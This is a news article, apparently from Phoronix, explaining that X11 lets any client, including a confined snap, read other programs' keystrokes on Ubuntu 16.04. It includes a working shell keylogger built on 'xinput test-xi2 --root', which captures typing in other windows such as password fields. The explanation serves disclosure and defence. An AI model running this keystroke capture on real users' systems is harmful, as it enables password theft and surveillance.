Ubuntu Snap's Security Is Easily Circumvented Due To X11

Ubuntu's Snappy packaging is designed to confine applications so that one program cannot tamper with the rest of the system, but with Ubuntu 16.04 still using X11/X.Org by default on the desktop, that confinement is much weaker than advertised.
As any frequent reader of Phoronix knows, X11/X.Org was never designed with isolation between clients in mind: every client connected to the display server can observe, and inject, input for every other client. A "sandboxed" application running in such an environment is therefore not sandboxed in any meaningful way with respect to the other programs on the desktop. Matthew Garrett wrote a simple Snap-packaged example to show that, under X, a "secure" (strictly confined) snap can still capture any other program's keyboard input, purely because of how X11 is designed.
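As an added illustration of the X11 behaviour described above (this is not code from Garrett's post, from the Phoronix article, or from the Snap project), the following shell script asks the X server for XInput2 raw key events on the root window, which the server delivers to any client that asks, regardless of which window has focus, and decodes them into typed characters. It assumes the X.Org xinput and xmodmap tools and GNU coreutils stdbuf are installed and that $DISPLAY reaches a running X server; the sample log and keymap embedded in the script are constructed to mimic those tools' output formats, not captured from a real session.

```shell
#!/bin/sh
# Added illustration of the X11 weakness described in the article; not code
# from Garrett's post or from the Snap project. Any X client that can reach
# the display, including a strictly confined snap that has the x11 plug
# connected, can select XInput2 "raw" key events on the root window and
# then receives every keystroke no matter which window has focus. No extra
# privilege is involved: this is simply how the protocol works.
#
# Assumptions: the xinput and xmodmap tools (X.Org) and stdbuf (GNU
# coreutils) are installed, and $DISPLAY points at a running X server.

# keys_from_xi2_log KEYMAP
#   Reads `xinput test-xi2 --root` output on stdin and prints the character
#   behind each RawKeyPress, using KEYMAP in `xmodmap -pke` format
#   ("keycode  38 = a A a A ..."). Unknown keycodes print as <code>.
#   Shift state is deliberately not tracked, to keep the decoder short.
keys_from_xi2_log() {
    awk -v keymap="$1" '
    BEGIN {
        n = split(keymap, lines, "\n")
        for (i = 1; i <= n; i++) {
            # fields: keycode <code> = <unshifted> <shifted> ...
            if (split(lines[i], f, /[ \t]+/) >= 4 && f[1] == "keycode")
                sym[f[2]] = f[4]
        }
        inpress = 0
    }
    /^EVENT type [0-9]+ \(RawKeyPress\)/ { inpress = 1; next }
    /^EVENT/                             { inpress = 0; next }
    inpress && $1 == "detail:" {
        s = ($2 in sym) ? sym[$2] : "<" $2 ">"
        if (s == "space") s = " "
        printf "%s", s
        fflush()
        inpress = 0
    }
    END { printf "\n" }'
}

# snoop_live: the real thing. Run it from one terminal, then type into any
# other window (a browser password field, another terminal, ...): the
# keystrokes appear here. Ctrl-C to stop. stdbuf keeps xinput line-buffered
# so characters show up as they are typed.
snoop_live() {
    stdbuf -oL xinput test-xi2 --root | keys_from_xi2_log "$(xmodmap -pke)"
}

# Constructed sample data so the decoder can be exercised offline. The log
# mimics the record layout xinput prints for raw XI2 events; the keymap
# lines mimic `xmodmap -pke` output for a US layout.
SAMPLE_KEYMAP='keycode  33 = p P p P
keycode  38 = a A a A
keycode  39 = s S s S
keycode  65 = space NoSymbol space'

SAMPLE_LOG='EVENT type 13 (RawKeyPress)
    device: 3 (3)
    detail: 33
    valuators:
EVENT type 14 (RawKeyRelease)
    device: 3 (3)
    detail: 33
    valuators:
EVENT type 13 (RawKeyPress)
    device: 3 (3)
    detail: 38
    valuators:
EVENT type 14 (RawKeyRelease)
    device: 3 (3)
    detail: 38
    valuators:
EVENT type 13 (RawKeyPress)
    device: 3 (3)
    detail: 39
    valuators:
EVENT type 13 (RawKeyPress)
    device: 3 (3)
    detail: 39
    valuators:'

# decode_sample: decodes the constructed log above; prints "pass".
decode_sample() {
    printf '%s\n' "$SAMPLE_LOG" | keys_from_xi2_log "$SAMPLE_KEYMAP"
}
```

Nothing in the script is specific to snaps: it is the same thing any ordinary X client, confined or not, can do, which is exactly why confinement buys little on an X11 desktop. The check a practitioner wants on a 16.04 system is `snap interfaces`, which lists which installed snaps have the x11 slot connected; each of those is in the position this script demonstrates.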
Garrett acknowledges that Snap packages will be better protected once the desktop runs on Mir rather than X.Org, but the Ubuntu 16.04 LTS desktop does not use Mir by default. Both Wayland and Mir are much more secure in this respect than the xorg-server, since their protocols deliver input only to the focused client and do not let one client read or inject another client's events. For the same reasons, GNOME's XDG-App initiative for application sandboxing also prefers Wayland over the X.Org Server.
Matthew Garrett concluded his latest blog post with, "The Snap format provides a lot of underlying technology that is a great step towards being able to protect systems against untrustworthy third-party applications, and once Ubuntu shifts to using Mir by default it'll be much better than the status quo. But right now the protections it provides are easily circumvented, and it's disingenuous to claim that it currently gives desktop users any real security."